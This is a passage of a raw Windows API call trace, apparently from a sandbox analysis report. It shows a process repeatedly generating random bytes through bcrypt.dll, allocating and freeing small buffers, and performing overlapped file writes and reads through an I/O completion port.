(lpLibFileName="bcrypt.dll") returned 0x753f0000 [0177.080] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0177.080] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0177.080] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0177.080] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0177.080] free (_Block=0x3e305b8) [0177.080] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0177.080] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0177.081] free (_Block=0x1fa91d0) [0177.081] free (_Block=0x1fa2ed8) [0177.081] free (_Block=0x1fa90b8) [0177.081] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0177.081] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0177.082] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToWrite=0x4c50, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 0x0 [0177.082] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0177.094] ReadFile (in: hFile=0x2a8, lpBuffer=0x3f7007c, nNumberOfBytesToRead=0x8e0, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048) returned 0x0 [0177.094] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0177.109] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0177.110] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0177.110] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0177.110] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0177.110] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0177.110] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0177.110] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0177.110] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0177.110] free (_Block=0x3e305b8) [0177.110] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0177.110] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0177.111] free (_Block=0x1fa91d0) [0177.111] free (_Block=0x1fa2ed8) [0177.111] free (_Block=0x1fa90b8) [0177.111] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 0x0 [0177.112] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0177.120] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0177.120] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0177.120] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0177.120] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0177.121] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0177.121] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0177.121] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0177.121] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0177.121] free (_Block=0x3e305b8) [0177.121] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0177.121] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0177.121] free (_Block=0x1fa91d0) [0177.121] free (_Block=0x1fa2ed8) [0177.121] free (_Block=0x1fa90b8) [0177.121] WriteFile (in: hFile=0x170, lpBuffer=0x1ff1e94, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0177.122] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0177.130] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0177.131] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0177.131] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0177.131] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0177.131] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0177.131] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0177.132] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0177.132] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0177.132] free (_Block=0x3e305b8) [0177.132] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0177.132] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0177.132] free (_Block=0x1fa91d0) [0177.132] free (_Block=0x1fa2ed8) [0177.132] free (_Block=0x1fa90b8) [0177.132] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 0x0 [0177.133] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0177.140] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0177.141] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0177.141] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0177.141] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0177.142] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0177.142] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0177.142] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0177.142] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0177.142] free (_Block=0x3e305b8) [0177.142] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0177.142] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0177.142] free (_Block=0x1fa91d0) [0177.142] free (_Block=0x1fa2ed8) [0177.142] free (_Block=0x1fa90b8) [0177.142] WriteFile (in: hFile=0x170, lpBuffer=0x1ff1e94, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0177.144] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0177.149] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0177.149] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0177.149] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0177.149] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0177.150] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0177.150] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0177.150] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0177.150] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0177.150] free (_Block=0x3e305b8) [0177.150] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0177.150] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0177.150] free (_Block=0x1fa91d0) [0177.150] free (_Block=0x1fa2ed8) [0177.150] free (_Block=0x1fa90b8) [0177.150] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 0x0 [0177.151] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0177.162] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0177.163] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0177.163] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0177.163] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0177.163] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0177.163] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0177.163] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0177.163] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0177.164] free (_Block=0x3e305b8) [0177.164] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0177.164] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0177.164] free (_Block=0x1fa91d0) [0177.164] free (_Block=0x1fa2ed8) [0177.164] free (_Block=0x1fa90b8) [0177.164] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 0x0 [0177.165] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0177.170] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0177.170] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0177.170] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0177.170] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0177.170] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0177.170] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0177.171] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0177.171] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0177.171] free (_Block=0x3e305b8) [0177.171] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0177.171] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0177.171] free (_Block=0x1fa91d0) [0177.171] free (_Block=0x1fa2ed8) [0177.171] free (_Block=0x1fa90b8) [0177.171] WriteFile (in: hFile=0x170, lpBuffer=0x1ff1e94, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0177.172] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0177.185] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0177.186] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0177.186] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0177.186] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0177.186] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0177.186] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0177.187] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0177.187] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0177.187] free (_Block=0x3e305b8) [0177.187] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0177.187] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0177.187] free (_Block=0x1fa91d0) [0177.187] free (_Block=0x1fa2ed8) [0177.187] free (_Block=0x1fa90b8) [0177.187] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 0x0 [0177.190] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0177.199] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0177.199] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0177.200] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0177.200] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0177.200] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0177.200] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0177.200] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0177.200] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0177.200] free (_Block=0x3e305b8) [0177.200] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0177.200] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0177.201] free (_Block=0x1fa91d0) [0177.201] free (_Block=0x1fa2ed8) [0177.201] free (_Block=0x1fa90b8) [0177.201] WriteFile (in: hFile=0x2a8, lpBuffer=0x1ff1e94, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0177.201] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0177.211] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0177.212] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0177.212] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0177.212] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0177.212] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0177.212] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0177.213] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0177.213] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0177.213] free (_Block=0x3e305b8) [0177.213] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0177.213] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0177.213] free (_Block=0x1fa91d0) [0177.213] free (_Block=0x1fa2ed8) [0177.213] free (_Block=0x1fa90b8) [0177.213] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0177.225] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0177.235] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0177.235] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0177.235] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0177.235] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0177.236] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0177.236] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0177.236] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0177.236] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0177.236] free (_Block=0x3e305b8) [0177.236] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0177.236] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0177.237] free (_Block=0x1fa91d0) [0177.237] free (_Block=0x1fa2ed8) [0177.237] free (_Block=0x1fa90b8) [0177.237] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 0x0 [0177.239] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0177.259] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0177.379] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0177.380] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0177.380] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0177.380] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0177.380] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0177.381] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0177.381] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0177.381] free (_Block=0x3e305b8) [0177.381] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0177.381] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0177.381] free (_Block=0x1fa91d0) [0177.381] free (_Block=0x1fa2ed8) [0177.381] free (_Block=0x1fa90b8) [0177.381] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 0x0 [0177.382] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0177.420] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0177.421] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0177.421] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0177.421] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0177.421] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0177.421] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0177.421] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0177.421] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0177.421] free (_Block=0x3e305b8) [0177.421] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0177.421] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0177.422] free (_Block=0x1fa91d0) [0177.422] free (_Block=0x1fa2ed8) [0177.422] free (_Block=0x1fa90b8) [0177.422] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToWrite=0x616, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 0x0 [0177.423] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0177.429] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0177.429] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0177.429] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0177.429] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0177.430] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0177.430] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0177.430] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0177.430] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0177.430] free (_Block=0x3e305b8) [0177.430] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0177.430] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0177.430] free (_Block=0x1fa91d0) [0177.430] free (_Block=0x1fa2ed8) [0177.430] free (_Block=0x1fa90b8) [0177.430] WriteFile (in: hFile=0x338, lpBuffer=0x1ff1e94, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0177.432] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0177.443] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0177.443] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0177.443] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0177.443] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0177.444] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0177.444] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0177.444] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0177.444] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0177.444] free (_Block=0x3e305b8) [0177.444] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0177.444] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0177.444] free (_Block=0x1fa91d0) [0177.444] free (_Block=0x1fa2ed8) [0177.444] free (_Block=0x1fa90b8) [0177.444] WriteFile (in: hFile=0x338, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x615, lpNumberOfBytesWritten=0x0, 